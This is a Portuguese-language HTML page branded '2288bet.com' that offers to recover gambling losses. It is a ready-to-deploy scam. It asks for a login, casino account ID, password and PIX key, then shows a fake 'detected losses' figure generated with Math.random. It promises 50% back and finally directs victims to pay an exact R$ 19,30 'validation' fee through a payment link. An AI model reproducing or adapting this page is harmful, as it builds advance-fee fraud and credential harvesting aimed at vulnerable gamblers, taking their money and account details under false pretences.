<html>
<head>
  <meta charset="UTF-8">
  <title>2288bet.com</title>
  <style>
    * {
      margin: 0;
      padding: 0;
      box-sizing: border-box;
      font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
    }

    body {
      background: url('vffvevfev.webp');
      background-size: cover;
      background-position: center;
      background-repeat: no-repeat;
      background-attachment: fixed;
      color: #fff;
      min-height: 100vh;
      position: relative;
    }

    body::before {
      content: '';
      position: absolute;
      top: 0;
      left: 0;
      right: 0;
      bottom: 0;
      background: linear-gradient(135deg, rgba(0, 100, 0, 0.95), rgba(0, 100, 0, 0.95));
      z-index: 0;
    }

    .container {
      position: relative;
      z-index: 1;
      max-width: 800px;
      margin: 0 auto;
      padding: 20px;
    }

    .logo {
      text-align: center;
      margin-bottom: 40px;
      display: flex;
      align-items: center;
      justify-content: center;
      gap: 15px;
    }

    .bank-logo {
      width: 60px;
      height: 60px;
      object-fit: contain;
      background: transparent;
    }

    .card {
      background: rgba(255, 255, 255, 0.1);
      backdrop-filter: blur(10px);
      border-radius: 15px;
      padding: 30px;
      margin-bottom: 20px;
      border: 1px solid rgba(255, 255, 255, 0.1);
      box-shadow: 0 8px 32px rgba(0, 0, 0, 0.1);
    }

    h1 {
      font-size: 2.5em;
      text-align: center;
      color: #007bff;
      margin-bottom: 20px;
      text-shadow: 2px 2px 4px rgba(0, 0, 0, 0.5);
    }

    .form-group {
      margin-bottom: 20px;
    }

    label {
      display: block;
      margin-bottom: 8px;
      color: #ffd700;
    }

    input, select {
      width: 100%;
      padding: 12px;
      border: none;
      border-radius: 5px;
      background: rgba(255, 255, 255, 0.1);
      color: #fff;
      margin-bottom: 10px;
      border: 1px solid rgba(255, 215, 0, 0.3);
    }

    button {
      width: 100%;
      padding: 12px;
      background: #ffd700;
      border: none;
      border-radius: 5px;
      color: #1a1a2e;
      font-weight: bold;
      cursor: pointer;
      transition: all 0.3s ease;
      box-shadow: 0 4px 15px rgba(255, 215, 0, 0.3);
    }

    button:hover {
      background: #ffed4a;
      transform: translateY(-2px);
      box-shadow: 0 6px 20px rgba(255, 215, 0, 0.4);
    }

    .success-message {
      color: #4CAF50;
      text-align: center;
      margin-top: 10px;
    }

    .error-message {
      color: #ff4444;
      text-align: center;
      margin-top: 10px;
    }

    .coins-animation {
      position: fixed;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      pointer-events: none;
      z-index: 2;
    }

    .coin {
      width: 40px;
      height: 40px;
      position: absolute;
      background: radial-gradient(circle at 30% 30%, #ffd700, #b8860b);
      border-radius: 50%;
      border: 2px solid #daa520;
      box-shadow: 
        inset 0 0 10px #fff,
        0 0 20px #ffd700;
      animation: shine 2s infinite;
    }

    @keyframes shine {
      0%, 100% {
        filter: brightness(100%);
      }
      50% {
        filter: brightness(130%);
      }
    }

    .progress-steps {
      display: flex;
      justify-content: space-between;
      margin-bottom: 30px;
    }

    .step {
      flex: 1;
      text-align: center;
      position: relative;
      padding: 10px;
    }

    .step.active {
      color: #ffd700;
    }

    .step:not(:last-child)::after {
      content: '';
      position: absolute;
      top: 50%;
      right: -50%;
      width: 100%;
      height: 2px;
      background: rgba(255, 215, 0, 0.3);
    }

    .step.completed:not(:last-child)::after {
      background: #ffd700;
    }

    .step-number {
      width: 30px;
      height: 30px;
      border-radius: 50%;
      background: rgba(255, 215, 0, 0.3);
      display: flex;
      align-items: center;
      justify-content: center;
      margin: 0 auto 10px;
    }

    .step.active .step-number,
    .step.completed .step-number {
      background: #ffd700;
      color: #1a1a2e;
    }

    .form-group p {
      color: #fff;
      margin-bottom: 15px;
      line-height: 1.5;
    }
  </style>
</head>
<body>
  <div class="coins-animation" id="coinsAnimation"></div>

  <div class="container">
    <div class="logo">
      <img src="rfefrerferf.png" alt="2288bet Logo" class="bank-logo">
      <h1>2288bet.com</h1>
      <img src="rfefrerferf.png" alt="2288bet Logo" class="bank-logo">  
    </div>

    <div class="progress-steps">
      <div class="step completed" id="step1">
        <div class="step-number">1</div>
        <div>Cadastro</div>
      </div>
      <div class="step" id="step2">
        <div class="step-number">2</div>
        <div>Verifica&#xe7;&#xe3;o</div>
      </div>
      <div class="step" id="step3">
        <div class="step-number">3</div>
        <div>Recupera&#xe7;&#xe3;o</div>
      </div>
      <div class="step" id="step4">
        <div class="step-number">4</div>
        <div>Valida&#xe7;&#xe3;o</div>
      </div>
    </div>

    <div class="card" id="registerForm">
      <h2>Cadastro</h2>
      <div class="form-group">
        <label>Nome de Login</label>
        <input type="text" id="username" placeholder="Digite seu nome de usu&#xe1;rio">
      </div>
      <div class="form-group">
        <label>ID da Conta do Casino</label>
        <input type="text" id="casinoId" placeholder="Digite seu ID do casino">
      </div>
      <div class="form-group">
        <label>Senha</label>
        <input type="password" id="password" placeholder="Digite sua senha">
      </div>
      <div class="form-group">
        <label>Confirmar Senha</label>
        <input type="password" id="confirmPassword" placeholder="Confirme sua senha">
      </div>
      <div class="form-group">
        <label>Tipo de Chave PIX</label>
        <select id="pixKeyType">
          <option value>Selecione o tipo de chave</option>
          <option value="cpf">CPF</option>
          <option value="email">E-mail</option>
          <option value="phone">Telefone</option>
          <option value="random">Chave Aleat&#xf3;ria</option>
        </select>
      </div>
      <div class="form-group">
        <label>Chave PIX</label>
        <input type="text" id="pixKey" placeholder="Digite sua chave PIX">
      </div>
      <button onclick="register()">Cadastrar</button>
    </div>

    <div class="card" id="verificationForm" style="display: none;">
      <h2>Verifica&#xe7;&#xe3;o de Conta</h2>
      <div class="form-group">
        <label>C&#xf3;digo de Verifica&#xe7;&#xe3;o</label>
        <input type="text" id="verificationCode" placeholder="Digite o c&#xf3;digo de 6 d&#xed;gitos">
        <p style="color: #ffd700; font-size: 0.9em; margin-top: 5px;">
          Um c&#xf3;digo de verifica&#xe7;&#xe3;o foi enviado para seu email cadastrado
        </p>
      </div>
      <button onclick="verify()">Verificar</button>
    </div>

    <div class="card" id="recoverySection" style="display: none;">
      <h2>Recupera&#xe7;&#xe3;o de Perdas</h2>
      <div class="form-group">
        <label>Total de Perdas Detectadas</label>
        <input type="text" id="totalLosses" readonly>
      </div>
      <div class="form-group">
        <label>Valor Recuper&#xe1;vel (50%)</label>
        <input type="text" id="recoveryAmount" readonly>
      </div>
      <div class="form-group">
        <label>Sua Chave PIX Cadastrada</label>
        <input type="text" id="registeredPixKey" readonly>
      </div>
      <button onclick="requestRecovery()">Solicitar Recupera&#xe7;&#xe3;o</button>
    </div>

    <div class="card" id="validationSection" style="display: none;">
      <h2>Valida&#xe7;&#xe3;o de Conta via PIX</h2>
      <div class="form-group">
        <p>Para garantir que a conta registrada pertence ao usu&#xe1;rio, &#xe9; necess&#xe1;rio realizar uma valida&#xe7;&#xe3;o simples. Solicitamos que seja feito um PIX no valor exato de R&#x24; 19,30.</p>
        <p>Esse procedimento serve exclusivamente para confirmar a titularidade da conta. Ap&#xf3;s a valida&#xe7;&#xe3;o, o valor ser&#xe1; devidamente devolvido ou confo utilizado</p>
        <p style="color: #ffd700; font-weight: bold; margin-top: 20px;">Importante:</p>
        <p>O valor deve ser exato: R&#x24; 19,30.</p>
      </div>
      <button onclick="window.location.href=&apos;https://pay.kiwify.com.br/bAJkDqK&apos;">Validar</button>
    </div>

    <div class="card" id="loginForm" style="display: none;">
      <h2>Login</h2>
      <div class="form-group">
        <label>Nome de Login</label>
        <input type="text" id="loginUsername" placeholder="Digite seu nome de usu&#xe1;rio">
      </div>
      <div class="form-group">
        <label>Senha</label>
        <input type="password" id="loginPassword" placeholder="Digite sua senha">
      </div>
      <button onclick="login()">Entrar</button>
    </div>
  </div>

  <script>const users = [];
function register() {
  const username = document.getElementById('username').value;
  const casinoId = document.getElementById('casinoId').value;
  const password = document.getElementById('password').value;
  const confirmPassword = document.getElementById('confirmPassword').value;
  const pixKeyType = document.getElementById('pixKeyType').value;
  const pixKey = document.getElementById('pixKey').value;
  if (!username || !casinoId || !password || !confirmPassword || !pixKeyType || !pixKey) {
    alert('Por favor, preencha todos os campos!');
    return;
  }
  if (password !== confirmPassword) {
    alert('As senhas não coincidem!');
    return;
  }
  const user = {
    username,
    casinoId,
    password,
    pixKeyType,
    pixKey,
    losses: Math.floor(Math.random() * 50000) + 10000
  };
  users.push(user);
  document.getElementById('registerForm').style.display = 'none';
  document.getElementById('loginForm').style.display = 'block';
  document.getElementById('step2').classList.add('completed');
  document.getElementById('step3').classList.add('active');
}
function login() {
  const username = document.getElementById('loginUsername').value;
  const password = document.getElementById('loginPassword').value;
  const user = users.find(u => u.username === username && u.password === password);
  if (user) {
    document.getElementById('loginForm').style.display = 'none';
    document.getElementById('recoverySection').style.display = 'block';
    document.getElementById('step3').classList.add('active');
    document.getElementById('step2').classList.add('completed');
    document.getElementById('totalLosses').value = `R$ ${user.losses.toFixed(2)}`;
    document.getElementById('recoveryAmount').value = `R$ ${(user.losses * 0.5).toFixed(2)}`;
    document.getElementById('registeredPixKey').value = user.pixKey;
  } else {
    alert('Usuário ou senha incorretos!');
  }
}
function requestRecovery() {
  const username = document.getElementById('loginUsername').value;
  const user = users.find(u => u.username === username);
  if (user) {
    document.getElementById('recoverySection').style.display = 'none';
    document.getElementById('validationSection').style.display = 'block';
    document.getElementById('step3').classList.add('completed');
    document.getElementById('step4').classList.add('active');
  }
}
function createCoin() {
  const coin = document.createElement('div');
  coin.className = 'coin';
  coin.style.left = Math.random() * 100 + 'vw';
  coin.style.top = '-50px';
  coin.innerHTML = '₿';
  coin.style.fontSize = '24px';
  coin.style.color = '#ffd700';
  coin.style.textShadow = '0 0 5px #fff';
  coin.style.display = 'flex';
  coin.style.alignItems = 'center';
  coin.style.justifyContent = 'center';
  coin.style.transform = `rotate(${Math.random() * 360}deg)`;
  document.getElementById('coinsAnimation').appendChild(coin);
  let rotation = 0;
  const animate = () => {
    rotation += 5;
    coin.style.transform = `rotate(${rotation}deg)`;
    const currentTop = parseFloat(coin.style.top);
    if (currentTop < window.innerHeight) {
      coin.style.top = currentTop + 2 + 'px';
      requestAnimationFrame(animate);
    } else {
      coin.remove();
    }
  };
  requestAnimationFrame(animate);
}
setInterval(createCoin, 500);</script>
</body>
</html>